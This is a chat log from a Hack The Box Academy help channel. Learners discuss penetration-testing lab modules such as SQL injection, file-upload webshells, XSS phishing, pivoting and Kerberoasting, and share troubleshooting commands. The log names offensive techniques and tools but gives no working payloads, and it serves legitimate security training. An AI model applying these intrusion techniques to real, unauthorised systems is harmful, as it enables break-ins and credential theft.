#modules
Hi, I want to reset my HTB Academy progress and start from scratch. Is that possible?
No, unfortunately not @tepid lion
just make a new account ngl
Any staff member here who would know this...?
Hey! Working on Attacking Enterprise Networks module. I'm stuck on the "Web Enumeration & Exploitation" section, specifically SSRF & XXE. I can do the exploit and view the files, but I can't figure out how to list the contents of a folder, or even search for the flag. Seems I can only read files, not list folder contents.
guys for anyone who finished the skill test for the ffuf module what list did you use for the last question
One of the Xato ones
@signal stag this is the place to ask questions on modules, but please do not share information like flags etc as you did in your other post. You are looking in the wrong service. You already used the flag you shared in another answer as correct. Look somewhere else.
There is one with almost 900k lines in it; is the other shorter?
Can't recall. Only have hasty notes scribbled for that module. Only wrote down (xatosomethingoranother)
thanks
Has anyone found an easier way to copy the modules into obsidian since the update?
I'm spending a considerable amount of time fixing the markdowns. It's pretty frustrating.
I'm planning to buy a student plan for a few months so as to cover the CPTS and COAI role paths, while wondering if its modules would be accessible to me in this plan
No reason why you can't.
I'm not sure about the student plan. Are you sure it gives access to all the modules for CPTS?
To my knowledge it does - https://help.hackthebox.com/en/articles/13677074-academy-subscriptions#h_538e93266c
Yes it does, for CPTS, CWES, and COAI, one... I completed the CPTS path using the student sub
I am not sure, but it gives access to 96 modules in the student plan
it gives access to all modules that are tier2 and below
anyone have the LLM Output Attacks Skill Assessment lab running incredibly slow? Trying to send a message to the imagebot and it takes 5+ minutes for one, this isnt feasible
Hi, I'm currently at the SQL Injections Fundamentals course and Subverting Query Logic sub-section. I just want to ask that I do get into the SQL injection but flag isn’t visible anywhere. Am I supposed to look elsewhere or is this an issue? I've attached an image for reference.
The same thing is happening with other challenges as well
You somehow logged in as admin and not tom. That's why you don't see a flag. Hit me up with your query and I could help
Ikr, I'm more concerned about using the cracked version of Cobalt Strike, I wanna try it once, but obv can't afford the legit one, it's like 3k, and don't wanna get banned at the same time 🥲
I definitely don't recommend getting and using a cracked/pirated version of Cobalt Strike. There are plenty of open-source alternatives. If you really want to try it and learn it, there are courses out there you can take, which provide access to the tool legally.
Alright, ig I'll just try other frameworks.... thanks tho 🙂
Hello, is anybody having issues with https://academy.hackthebox.com/app/module/267/section/3048 ? When I generate the new powershell and put in the password, I am unable to display the flag. It tells me it doesn't exist. Yet when I ping \LAB-DC there are no packets lost.
Hey everyone, I’m new to cybersecurity and currently learning Linux, Kali, and networking. I recently started setting up my lab and practicing beginner rooms/boxes. I’m really interested in ethical hacking and would love advice on how to improve and learn properly. Nice to meet you all.
Hello!
I am working on Understanding Log Sources & Investigating with Splunk and have a question about the Using splunk applications section. Do we have to make an account on splunkbase to download the sysmon app, or is the app file already on the system somewhere?
@shut wraith Please take care not to post content from modules above tier 0
Hi everyone, can anyone help to find the answer to this question, Windows Privilege Escalation module, skill assessment part 1
Hello everyone, i'm currently doing Intro to Network Traffic Analysis and when RDPing into the target's IP my screen is completely black apart from some stuff at the top of it.
Can anyone help?
Hello everyone
I'm trying to read the flag in the skill assessment of file upload, but in the / directory I can see it but when I try to read it, the content is invisible
dm please
Hello is it possible to contact a moderator/administrator of the platform. It seems that a link in one of the modules redirects to a malicious link and attempts to make you execute code on your computer.
admins/mods are just for discord, you need to reach out to support on the website for issues like that. you can DM me the page though and i can check and pass it on.
Ok I'm dming you the elements I have
Anyone able to help with the exercise within Linux Privilege Escalation - Environment Enumeration, been enumerating for a while now but can't seem to find the flag, tried basically all commands and places mentioned in the section.
I'm unable to make any progress on Footprinting->MSSQL. My nmap scan errors out, and am unable to connect to the MSSQL service using the creds and command provided. The connection times out on my virtual instance of Parrot
I've tried other versions of mssqlclient found in locate mssqlclient and run into the same error above
Still stuck if anyone is able to help me out ❤️
guys is there another browser in the shells and payloads live engagement beside Links2 ?
its only displaying text mode
Good evening, has anyone completed the ‘File Upload Attacks’ module?
many have
Is this a module you would recommend?
it's a great module, i'd recommend going down the job paths over a single module though
When you talk about career progression, are you referring to annual plans that culminate in certification?
Hey, I'm currently stuck on Attacking Wordpress question 4 in the Attacking Common Applications module. The question is "Following the steps in this section, obtain code execution on the host and submit the contents of the flag.txt file in the webroot.". I managed to get the user, brute-force the password and I have a web shell but I can't find the flag.txt. Can anyone help me?
The training required for those certs, yes, but it doesn't require you purchase a subscription, you can do the paths as a standalone. The subscription would be a lot cheaper overall though, especially if you can get the student plan.
lol, I'm new here. You've only just found out there are student discounts
I’ll find out what would suit me best
ty for informations
Hello. Can anyone help me answer the 3rd question in Finding Hidden SSIDs in Wi-Fi Penetration Testing Basics. So, the question is:
Identify the name of the hidden SSID with the BSSID d2:a3:32:1b:29:d5 and submit it as your answer.
So, I used the command the tutorial suggested, and typed sudo mdk3 wlan0mon p -b a -c 1 -t d2:a3:32:1b:29:d5. And my output was:
"
SSID Bruteforce Mode activated!
channel set to: 1
Waiting for beacon frame from target...
Sniffer thread started
SSID is hidden. SSID Length is: 8.
Got response from D8:D6:3D:EB:29:D5, SSID: "CyberNet-Secure"
Last try was: g'
"
And it's been like this for an hour. I don't get it, the length is good, but "CyberNet-Secure" doesn't match this length. Also, I wrote d2:a3:32:1b:29:d5 as a MAC address, but it for some reason discovered D8:D6:3D:EB:29:D5. I already tried deauthenticating.
Needing to transfer a file from a win host back to pwnbox
win doesnt have python which i normally default to with http.server
thoughts?
scp
i saw that but i dont know the pwnbox credentials
desktop has credentials...
dude
ive been on this platform for so long and have never seen this
😭 😭
thank you
windows has invoke-webrequest (powershell) to be able to upload files https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.6
The Invoke-WebRequest cmdlet sends HTTP and HTTPS requests to a web page or web service. It parses the response and returns collections of links, images, and other significant HTML elements. This cmdlet was introduced in PowerShell 3.0. Beginning in PowerShell 7.0, Invoke-WebRequest supports proxy configuration defined by environment variables. ...
im sorry im having a hard time getting this working
the win host is powershell 5.1 which doesnt support the -Form parameter
i mean the alternative with xfreerdp is the /drive: option
trying to write report for AEN but i don't know if i should include all the vulnerabilities found since there are a lot of them or just the attack chain?
Anyone having problems with Detection & OpSec Cyber Range --> Detecting T1547.001 on Windows with the Detection & OpSec Cyber Range? I can't seem to get it to say that the answer is correct 🙂
When performing a pentest the company is paying for a full report of every issue you found, not just one attack path. Why wouldn't you provide all the issues you found instead of just some?
there is nothing i have not tried to get done with this but all to no avail, it is a question on frequency band on Network foundation .
Which frequency band is known for better wall penetration but more prone to interference?
if any one can help with the right answer, tried all i could
2.4ghz bro
doesn't work, done it with space, and no space same error
idk then @htb fix your platform
crazy it worked now
sorry @htb
already did
literally did send that earlier . Not the first time could be some kinda glitch, thanks btw
can anyone help me with a question in a module because whenever i enter the flag it says its incorrect
which module?
Network Enumeration with Nmap
DM me with specifics if you want
ok
What section is this in?
Capitalize GH in GHz
This is one of the few cases where the technicality of capital vs lower is important. G - Giga; g - not used in notation so as not to be somehow confused with grams. Hz - a unit of measurement (Hertz)
Thanks, it's just funny.
There's nothing I didn't do for it to work.
First submission as answer was 2.4 GHz .
It never worked, I tried several others, then someone tried it again with the same thing and it worked. That's not the first time, there's yet another case, but after a few trials it worked, and that was immediately after I refreshed.
I would like to suggest an addition to Active Directory Enumeration & Attacks module, is there any way to do that? Confidential way, ideally.
/feedback
Another addition? At this point just split it up instead of adding more
Cant share but it should be a relatively small addition
Hi everyone, I don't know if this is the right channel (if not I will move the message) but I've got a question:
I am a Junior Fullstack Developer and would like to grow my cybersec/infosec knowledge on my freetime after work.
I am also a certified Blockchain developer and would like to find my way on the messy road of IT jobs.
My ultimate job would be a mix of Blockchain development and Cybersecurity/Infosec.
I like to set a tangible goal to challenge myself so I would like to follow a path that ends by passing a certification. As I am a developer, I consider having the fundamentals to understand easy to medium modules (might be wrong x).
I was first looking at the CPTS cert which I know is hard but I like to challenge myself.
The problem is that I wonder if another cert could be a better fit for my career.
What are your thoughts/advices ?
Thanks a lot for your time 💚
Go for CWES ig, it would match your profile as fullstack developer, dont think there is blockchain in htb academy but I could be wrong
correct; there are no blockchain modules (yet) on HTB academy, they don't like making modules that they have little understanding or expertise on; there are blockchain challenges on the main platform however
Thanks for your responses, to clarify I am not searching for blockchain related certs/paths.
I just want to keep a kind of coherence between these domains and to develop skills that will serve me in some way during my career.
What is CWES reputation in companies ? I know CPTS is recognized as a high-skilled cert by tech leads but not by HR
I dont know that for sure but it would be lower than CPTS. CWES is web application pentesting, 70% of it is covered in CPTS but it teaches graphql, api, Server side attacks and some auth attacks additionally.
While CPTS has 70% CWES so covers a significant portion of web, it also has network pentesting (privilege escalation, tunneling, common services) + AD pentesting, so it is a generic pentesting certificate while CWES is fully web focused.
Hi everyone! I'm working on the "Android Fundamentals" module, specifically the "Android Emulators" section and im stuck I'm trying to find the correct Build Number for the Pixel 3a API 34 Google APIs AVD. My emulator shows UE1A.230829.036.A4, but the validator says it's incorrect. I've already tried the base version UE1A.230829.036 and .A1 without success. Does anyone know if the validator is looking for a specific revision or a different format? Thanks!
Alright thank you so much
@faint hamlet and what about COAE ? Looks interesting to dig AI x Cyber future jobs. But seems hard, is it intended for already skilled pentesters ?
I dont know about it, seems niche to me
I'm doing Linux Fundamentals, and am at System Management: Package management. The module says that I should download from a github link. When using pwn, I tried downloading it, but I have some issues when trying to download...
```
┌─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #curl -I https://github.com/
^C
┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #curl -I https://github.com/
^C
┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #nc -vz github.com 443
DNS fwd/rev mismatch: github.com != lb-140-82-121-4-fra.github.com
^C
┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #timeout 10 bash -c '</dev/tcp/github.com/443' && echo "443 open" || echo "443 blocked"
^C
┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #curl -I https://google.com/ --max-time 15
^C
┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #curl -I https://github.com/ --max-time 15
curl: (28) Connection timed out after 15001 milliseconds
┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #curl -4 -I https://github.com/ --max-time 15
curl: (28) Connection timed out after 15001 milliseconds
```
```
┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #curl -4 -I https://github.com/ --max-time 15
curl: (28) Connection timed out after 15001 milliseconds
┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #env | grep -i proxy
┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #env | grep -i proxy
┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #unset http_proxy https_proxy HTTP_PROXY HTTPS_PROXY all_proxy ALL_PROXY
┌─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318]
└──╼ #curl -I https://github.com/ --max-time 15
curl: (28) Connection timed out after 15001 milliseconds
```
I seem to be unable to create a connection, not just with google but also google etc...
I thought respawning a pwn might work, but forgot the daily limit...
pretty sure the pwnboxes don't have access to the internet...
Also, when trying the vpn way, I don't get admin access
E... so I should do it on my own system then?
yeah through the VPN
But on vpn I don't get any sudo permissions
huh? it's your own system... you should have sudo perms 
I meant on the spawned target
O wait
I just realised what you meant
Ok, I'll try that
Thanks 
I need more caffeine
Is it me or academy is super slow, and targets take for ever to spawn? cpts - linux privesc, well overall platform is super slow compared to labs
I just wanted to comment on this, mine is super slow too
yes
They might have issues with their servers recently
Small question in the Linux Fundamentals module, remote desktop protocols section: if the X server uses port 6000 for the first display then wouldn't its port range be 6000-6009?
I'm having the same issue, I had a terminal running a ping -c 1000 <vm-ip> to check if it's not responding... it is super slow.
i cant spawn targets
Can I DM anyone for NoSQL Injection Skill Assessment 2. I have read all messages from the forum and tried some variations with that. Its my second day on the challenge.
Has anyone finished the "Attacking Enterprise Networks" module? I'm stuck on the SSRF and XXE questions for the "Web Enumeration & Exploitation" module. I'm able to view the /etc/passwd file using both SSRF and XXE, but I'm having issues trying to enumerate the folders to find the flag. 🙁
aaaaaaaaa, finally found the injection endpoint. Just need to expand the query now.
And it was very simple, I don't know why i complicated things that much.
DM and i can try and help you out.
Thanks for the help! Can't believe it was that easy 😄 lol
@cloud urchin Hi, thanks for the info about the student discount (I signed up right away). I don't know if it's my fault, but I'd never come across this information before, so I'd probably still be buying the modules one by one right now. Maybe the student discount isn't promoted enough. Thanks again, and have a good evening.
Glad you got it, definitely much much cheaper with student discount, the value is insane
No, I should probably look into that.
Good evening, I'm stuck on the “File Upload Attacks” module in Section 5 (Blacklists) of the practical section. I'm being asked to bypass a blacklist. So I made a basic request intercepted by Burp, which I then sent to Intruder to test a list of PHP extensions (PayloadsAllTheThings) that could potentially bypass the blacklist. After getting the results, I tried to check the webshell but found no files. So I used another method: modifying the HTML code by uploading a file containing PHP. I get a message saying it went through fine, but no results. I’ve restarted several PwnBox instances and tried different targets, but nothing changes. I also tried accessing the file by manually testing all 22 extensions on the list, but still no results. I don’t really understand what the issue is. Any kind soul out there who can point me in the right direction?
so for web fuzzing module's directory and file fuzzing section, I am following along for the question and the section says to use common.txt wordlist at one point in the instructions but that wordlist only gives me one file. technically, another file is supposed to show up in the output as part of the example, but common.txt won't make it show up. I have gotten mixed results from different wordlists but none will show the hidden file. how do I get it to show me the hidden file? I know the file name but to me if I can't get ffuf to find it what's the point because I'm assuming I'm supposed to follow along. From there, I can go to the hidden file to get the flag I think.
I successfully found the folder I just can't find the other hidden file in the folder besides the index.
can someone point me in the right direction?
did you fuzz for directories, then for files?
You can dm if still stuck.
Hey, I'm in the Footprinting module right now and I'm in the SMTP section. The last question says that I should be using a wordlist to find the answer, but none are provided.....
There should be a resources button in the top-right next to the chapters
In the CPTS Footprinting Lab - Medium I cannot seem to resolve this below issue:
[17:55:07:435] [7800:7800] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
I've run
export DISPLAY=:0
export DISPLAY=ip-address:0.0
Googled the last hour. I'm completely lost and probably should power off the PC and go work at Home Depot at this point.
This usually happens when youre trying to rdp as root
I tried as root and user in the pwn box... nothing.
Try restarting the pwnbox then
I just connected to a completely different box.... same error.
Delete this as its a spoiler, but bear in mind protocols respond with a status code alongside a message 😉
Then reach out to support or try in your own vm
¯_(ツ)_/¯
Ok. Thank you for responding.
Also I recommend terminate -> start over just reset
But the error is client-side, not server-side.
Im also assuming youre using the in-browser vm, and not ssh in as ssh doesnt carry over a display variable by default
Yes in-browser.
yes
found the directory but only file I can find is index.html
the other file that's supposed to show up won't show up
since they tell me the page where the flag is in the instructions, I know I can get the flag but if I can't follow along because there's an issue or they aren't giving me the exact wordlist, then what's the point?
wanna get the full process right
I'm assuming its another wordlist besides common.txt
this is for the one question in Directory and File Fuzzing section of Web Fuzzing module
I already said that but I'm saying it again in case of confusion so everyone knows what I'm talking about
You can dm me if you're still stuck
will do thank you
Nvm
anyone done Premature Session Population (Auth Bypass) lab IN CWEE Path?
i have question, i have followed the exploitation steps, but it doesn't work. Am i missing some pieces?
i first attempted to login invalid, capture the session variable no followed redirection (here the session variable shouldn't be cleaned because i didn't follow redirection to /login.php?failed=1), craft a GET request to /profile.php with the captured session of admin user. still not working.
anyone has the answer?
i did it.
o/ Think I found a permissions bug that made a Medium Skills Assessment much easier than intended. Who/how do I reach out to confirm/fix?
Mentioned 2 years ago as well - https://discord.com/channels/473760315293696010/1261236325768495134
https://academy.hackthebox.com/app/module/116/section/1165 hi i am doing the module on ftp and i am unable to find the port that the ftp service is running on. i tried a full nmap scan (-p-) and none of the ports have ftp running on them. is there anything i'm missing?
DM if you want @burnt sundial
Are there multiple ways to solve the NoSQL injection skill assessment 2? As the hints mentioned by people on different forums are not aligning the way I solved.
There are often several ways to solve a problem. I don't know if that applies to this one
nvm, it worked after i restarted the box and waiting for a while
I'm currently trying to do the Skills Assessment of the LLM Output Attacks. If someone could help me and point me in the right direction, I would appreciate that. I have been stuck here for almost a week. Feel free to DM me
Is it me or the HTB academy targets arent spawning?
Im doing the password attacks module now and it keeps loading without spawning the target
+1 but for windows priv esc citrix breakout section.
I am experiencing the same issue too!
I changed my VPN region and it spawned. Perhaps you can try it as well. Thanks!
Yeah seems to be working now, i didnt even change VPN region
Still need help?
Hello, i need help for AD Trust Attacks, GPO on site, can i pm someone ?
Yes please!
I do not know if this is the right place, but i have a question for shells & payloads "live engagement": apache tomcat runs on the first host ( 172.16.1.11 port:8080) and a hint mentions the exact credentials. Was there any way for me to figure these out myself?
I am currently doing the "Bypassing Security Filters" section of the "Web Attacks" module. I was able to get the flag.txt file, however, the flag in it is not accepted/valid. It is not that kind of flag like "th1s_1s_f4k3_fl4g" or similar, as often misleads. Has anyone faced the same issue?
Hey gang! I'm working through the "Internal Information Gathering" section on the "Attacking Enterprise Networks" module. When trying to do ssh port forwarding, it just won't connect. I followed the steps outlined, unless I missed a small typo?
Intro to Network Traffic Analysis/Tcp Fundamentals can anyone explain why "Were absolute or relative sequence numbers used during the capture? (see question-1.zip to answer)" is ||relative||?
Since tcpdump is being used with -nnr, the output should default to absolute, right?
Also, seq 2387613953 etc is for the first two packets, but then it switches to relative
i dont get it
Does anybody know how to solve this problem when doing a kerberoasting attack using nxc? Error retrieving TGT for domain\user from 224.0.0.1 (proxychains). I have a pivot on dmz host.
i think you need to specify the domainname in /etc/krb5.conf
not sure
Hello, how can I get help ? I have around 4 days with Intermittent connection in the htb academy, in the module "Attacking Common Application" can't advance with this issue.
I tried to change vpn region, tried using the pwnbox, the same problem. I open the vm site, suddenly it stops responding... I have to wait around 5 minutes for it to work again or restart the vm... and it happens over and over
I am stuck on HTTP Response Splitting challenge, can someone help please ?
Hey guys I am doing WEP Attacks module and been stuck on Korek Chop Chop Attack section. Anyone available for help.
dm
Thanks but I got it
great
Hey guys, I'm doing the Skills Assessment - Password Attacks, and I've got access to DMZ01 (ext IP), and now trying to pivot to internal machines, however I believe I should be trying to proxychain my commands via my attackbox with nmap or ping test the other machines on the internal network, i can't establish a connection to them. Am I on the right path here?
Hey! i would like to ask about the skill assessment for the SQL Injection fundamental module
Should I try to do anything else from other modules?
or should i just focus on using everything in sql injection?
Does anyone have issues spawning targets? I'm doing "Attacking Enterprise Networks", at the Post-exploitation module, and the Spawn button doesn't do anything
ah, I see it's under maintenance. nevermind.
Hi for those who are doing Attacking Common Applications - Joomla - Discovery & Enumeration
If you are having trouble installing droopescan, here is how I solved the missing 'imp' library
```
# install python3.11
sudo add-apt-repository ppa:deadsnakes/ppa # python repo
sudo apt install python3.11
pipx install --python python3.11 droopescan
# Python 3.11 also deprecated distutils.utils
pipx inject droopescan setuptools
```
In Intro to Networking/ Networking Module, it is stated OSI is the new model and most widely used but ain't the OSI is the old model?
and tcp/IP is newer?
Pretty sure tcp/IP is just a simplified version of the OSI model
yep but the OSI model referred as newer model and most widely used was contradicting comparing to other networking lessons I had taken, that's why I asked.
also asked LLM which also said it's not true.
I've misread the question 🫡
You're right then I think
Hi - potentially silly question around the Pivoting, Tunneling and Port Forwarding module, section Remote/Reverse Port Forwarding with SSH
When downloading the msfvenom payload onto the Windows Target, and eventually executing the payload, should this be achieved via RDP using dynamic port forwarding?
TCP/IP is older
TCP/IP 70s, OSI 80s (though it was starting its conception in the 70s, it wasn't official until the 80s)
Restarting the target x3 times worked 😢
Good morning, friends! Sorry to bother you, but I need help. I'm working on the Cross-Site Scripting (XSS) module of the phishing page. I did everything correctly, but the bot accesses the login, but doesn't send me the credentials. Could someone give me a hint or guide me? Thank you all for your attention. This is the question: Try to find a working XSS payload for the image URL form found at '/phishing' on the server above, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then, access '/phishing/send.php' to send the URL to the victim, who will log in to the malicious form. If you did everything correctly, you should receive the victim's login credentials, which you can use to access '/phishing/login.php' and obtain the flag.
Hi, there's no way to revert to the old academy UI design right? I remember a button existing (?)
no, the button only existed while they were testing the new UI, the old UI has been retired
Linux Fundamentals module, Isn't this kind of inaccurate? I feel like ext4 is the file system most commonly used on linux distributions and Solaris does use ZFS as far as I know from my short googling, also SMF is not a file system I don't know why it says "On the other hand" as if its contrasting
I am having an issue with the sliver c2 Kerberos delegation module. it will not let me proxy chain using impacket's psexec even after i used socks5 proxy so it can reach i set the proxy on the jump box so it can reach it sooo i am so confused lol please dm me if you got past that part and can help.
If you are comfortable with ligolo you could use that instead.
let me message you.
excuse me, can anyone confirm or deny?
Hey! i would like to ask about the skill assessment for the SQL Injection fundamental module
Should I try to do anything else from other modules?
or should i just focus on using everything in sql injection?
everything you need to do is explained in the sections, all the concepts are there
of course it will be a different scenario thats why you will have to use the concepts you learned to exploit the webapp
hey guys im stuck in the network foundations module on question 3 of section 5
What type of message does a client send to accept an IP address from a DHCP server?
its a DHCP Request no?
I keep getting the answer incorrect ive tried putting it all together, separate, all lower case upper case, you name it and I keep getting it wrong. what am I writing wrong?
try without DHCP, this module is finicky with how it expects you to word the answer
Any help ? (Tier 3 HTTP Attacks module)
DACL Attacks II - Logon Scripts - Question 1
Script is on the right folder, and the payload works (I can get a session by triggering it as Julio).
I've set the scriptPath attribute using bloodyAD, and the path of the script file is present when querying:
```
scriptPath: \\DC03\NETLOGON\WaynesScripts\exploit.bat
```
Yet I can't get a shell as Wayne after waiting for ~10 minutes and two restarts. If you've solved it recently, please DM me.
any academy modules that will prepare me for reverse engineering challenges? Those <= Tier II
Anyone finished the Web Attacks module? I'm having trouble with the Bypassing Security Filters section and have a question.
Do I need to use pwn box in nmap module?
hey,
did anyone solve the NTLM relay attack section on authentication coercion and can help me figure out why it is not working as supposed?
nope
HI
I'm stuck on that module, Network Enumeration with Nmap, in its last section
Section name Firewall and IDS/IPS Evasion
Question (Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer).
yo guys, im on windows privesc, Further Credential Theft section. im really stuck at question 2,3,4, i want some hint
dm
Use detection evasion strategies, such as source port manipulation
DM if you are still stuck
DM if you need some pointers, recently did it
any help on loaded_shellcode? I can't seem to make it work, can't XOR it
and i'm having issues with misaligned junk
Hi everyone! I'm starting my cybersecurity journey and I'm looking for guidance on where to begin.
I currently only know Python programming, and I want to learn cybersecurity from 0 to 100, building a strong foundation step by step.
My intention is to subscribe to the HTB Academy Student Plan, so I would really appreciate recommendations about the best paths/modules to start with as a complete beginner.
My long-term goal is to get into penetration testing, but I also want to properly learn networking, Linux, web security, and the fundamentals first.
Thanks!
first of all welcome
second
i would recommend starting with job role paths
here is what i think can help if u r an absolute zero
https://academy.hackthebox.com/app/paths/419/details
from that jump off to either SOC role path or Penetration tester path depends on what you like
Thank you so much!
I think starting with the fundamentals first makes the most sense before choosing between SOC or penetration testing.
Really appreciate the guidance!
guys i need help , this may seem dumb or silly : https://academy.hackthebox.com/app/module/268/section/3068
CWES : api attacks / Security Misconfiguration
Hi , im on password attacks module - Pass the Hash. I am not able to get reverse shell from DC01 to MS01.
Hello. Im relatively new to HTB academy. I have realized that there is no option to download a .ovpn file for connecting into the HTB VPN anymore as it used to, for being able to solve the HTB exercises without using the pwnbox since I prefer using my own machine. If it still exists, I can not find the option absolutely anywhere. If someone could briefly clarify, I would be grateful. I hope this is the correct channel for asking for help
Same, been trying to find it for like 30 min now
Hi, to download the vpn file, you will find it in specific module exercises that need it
I am doing the file upload one right now, and under none of the modules there is an option to download one
If theres no option to connect to vpn, like this the exercise likely does not need u to connect to vpn
u can just spawn the target and start it
well I need to make a reverse shell, tried my public IP, but it didn't work. Just got a connection time out message
am I missing smth?
ye it's up, I can upload the file, but it never reaches my host
then u have messed something up , maybe in ur payload u didnt include port number of the local server you are hosting on/at
e.g x.x.x.x:8000
I did, tried multiple different ports as well
well idk which module u are doing so i cant help u rn , but if u can ping target its not a vpn issue
In other words, if there is no .ovpn download trigger, the exercise is meant to be solved via the pwnbox, and there is no possibility to use your own machine. Right?
u can solve it on your machine...you just dont need vpn to access the target
Ok I will further investigate it, since I understand that for accessing HTB machines you are strictly required to be inside the VPN environment
anyone getting this error on : https://academy.hackthebox.com/app/module/268/section/3063
CWES : API ATTACKS / Broken Object Property Level Authorization
are you trying to solve a question? I don't recall the endpoint "certificates of incorporation"
yes whenever i upload a file it get that error , however the skills assessment i can upload just fine
u have to upload remote-shell.exe
In the Linux fundamentals module, there is a question that asks me to type what is inside the hidden history folder in thm-student's home directory. Now I have done ls, ls -l and ls -la and there is no history file anywhere in the home directory, any help?
who's thm-student?
also dotfiles (files with a dot at the start) are hidden and are generally relative to the user. so /home/htb-student would be where to start looking
think of /home/ as C:/Users
hi, i am running into an issue in the CPTS module, most of the windows labs that we have to attack, rn in the shells and payloads module, stuck in payloads and windows shells subsection, for some reason i cannot set up a meterpreter session even if the exploit is showing successful. i have put LHOST as the ip for tun0. LPORT i am using default, should i experiment with some other port ? i dont exactly get whats going wrong
do guide me as to what i should try next, i have tried manual shell deployment in the shells and payloads/payloads section of the module by using msfvenom and smb, and setting a netcat listener on the specified port and it still didnt work. i will try it once more tonight.
Hey guys is anyone facing the same problem in metasploit ?
try copy pasting the exploit path, maybe that might work.
use {exploit}
ive tried that as well and it still does not work ..
i even did msfupdate and other more i still dont get the issue
no clue, metasploit is acting up for me as well but not getting this issue.
How does this work then lmaooo
Hey, I'm at the metasploit tier 0 module, and I've been trying for the past 2 hours to find a good exploit to get into the machine and answer the questions, but I couldn't for the life of me find a good exploit, and I've been searching for vulnerabilities back and forth with no luck. I'll post the nmap scan as a reference. I'll appreciate the help
Type "reload_all" and wait for msfconsole to reboot, then try again
I am doing the lab footprinting easy. I need to enumerate a DNS server. So far so good. I am struggling with a small detail (and in general the DNS enumeration is quite difficult i feel) that I didnt see. So, i enum the page and everything, got a lot of information out of it. Reached a certain point where i needed to check the solutions. Well, turns out, after the first nmap scan, there was an ftp server (which i connected to and it was empty). However, that ftp server was on ftp.internalt.inlanefreight.htb. I was enumerating all ".com" and it never crossed my mind, that I needed to start using the ".htb" ending. Why should I have known that I need to enum the .htb domain and not .com???
another interesting question is also: why do I need to do all the dns enumeration, if i do 1 nmap scan and I already got the correct ftp and can already login?
as it states earlier in the module, the point of enumeration is to understand the underlying infrastructure, not to attempt to force your way into the first weak spot. we want to find everything we can that looks even remotely interesting. also, i believe the exercise questions do in fact specify the .htb domain
is the difficulty of the "Attacking Common Services - Medium" medium because it is difficult to get an ip with the right service running? (how is the easy one easy and this one medium?)
Whoops! I cannot DM you after all due to your privacy settings. Please allow DMs from other server members and try again in 1 minute.
You're doing the skills assessment or just the DNS sub-module for the Footprinting module?
@terse osprey 👋🏽

did someone encounter this error when doing the skill assessment for mssql,exchange and sccm attacks module..i am not able to get the emails
Hello guys
I'm trying to do skill assessment of command injection module however I got stuck at finding real injection point
Am I on the right direction?
I tried view and quickview sections so far for command injection but they haven't revealed anything yet
I know that maybe the payload isn't true as there are a lot of techniques are covered in the whole module
Please just give the hint to me about the injection point,that's all
Can dm me if still stuck.
I just used PowerView. Instead of just htb-student try using the full email address.
Can anyone help me with the meterpreter section of the Metasploit tier 0 academy module?
Which section are you working on?
I'm at the meterpreter section, and I still couldn't find the right exploit to enter the machine
or section 11/15
Ok, tracking and have you tried what was shown in the section? Not sure if that is a follow along section, so I am asking because I truly don't know.
I did try using the same exploit as the section, but it didn't work. I also did try the exploit from cve-2017-7269 (as it is shown in the section), and it still failed. I then researched over again for multiple exploits (mainly for microsoft's iis 10, but also for smb) with no luck at all.
Did you start off with an nmap scan?
yes, most of the open ports were for Windows RPC, but the one that caught my eyes the most was Microsoft's IIS 10, since the version 6 of the same service was present in the example from the section
Did you identify any ports and services that aren't just Windows default ports and services?
Only the SMB service and Ms Terminal services were at their default ports. The rest I believe were custom set ports
Did you by chance enumerate the services potentially being used by those custom ports?
I did, and all I got were ports 49664-49671 and port 135 (forgot to mention this one as being also default) belong to windows rpc, as for the Microsoft's httpapi httpd 2.0, it's got ports 5985 and 47001
Alongside with IIS at port 5000
Hi guys
That's the only flag I could find on the PTRG dashboard using program execution through notification vulnerability
I would search the service associated with this port using your msfconsole session.
Well yeah, that's what I've been searching for all day, but exploit after exploit failed
Please refrain from posting flags from content. If a sanity check is necessary, I suggest asking for that instead. That flag did look like the correct one, so if it is not being accepted, check for leading and trailing space. Can also refresh the page and attempt to submit it again.
DM me how you are configuring it.
My bad, I wasn't so thoughtful posting that, I'll undo that message and DM you, I'd appreciate any suggestion for finding the flag
All good, I removed it. DM it to me and I'll double check what I have on my end.
Hello! In recent times, within certain modules, the flag etc. has been placed directly on the desktop or solely within the documents.
Consequently, almost no enumeration has been required. Is this truly correct?
yeah generally all they want is to make sure you did the steps to gain access to the user/admin. you don't need to go hunting down a file after you got full access, the goal is the access itself
Well it was like "rdp as the user bob" Find his hidden credentials or something to receive password, and the flag was on desktop, immediately after rdp :p. Still did all the steps but..
yoo wats up htb im a beginner n just finished my first module the one with nmap enumeration i read thru all the theory n i did all the easy medium boxes but got stuck on the hard box. i did everything but i wasnt able to find what i needed i did the box thru vpn on my local vm but when i tried running it once on the vm on the parrotbox on the site the exact thing i was looking for did show up with the exact same command. idk if it was intentional or not... but it wasnt mentioned anywhere that the ids cared bout ingress/outgress traffic... so it was annoyingly frustrating that i couldnt complete it without turning on the machine on the site itself. was that intentional or was there a way i could do a nmap scan n find that specific port on my local vm?
for reference
Thank you for replying, appreciate the help 🙏
I figured it out after, turns out that I was just super baked and couldn't read the question properly, haha. I looked back over the next day and worked it out, really simple, .bash_history was the answer 🙈🙈🙈
Hey, i've been trying to get burpsuite working for the file upload attacks module but burpsuite has not been working. i've been trying to download and add the certificate to firefox but i am having a lot of trouble, and it seems like the system won't let me.
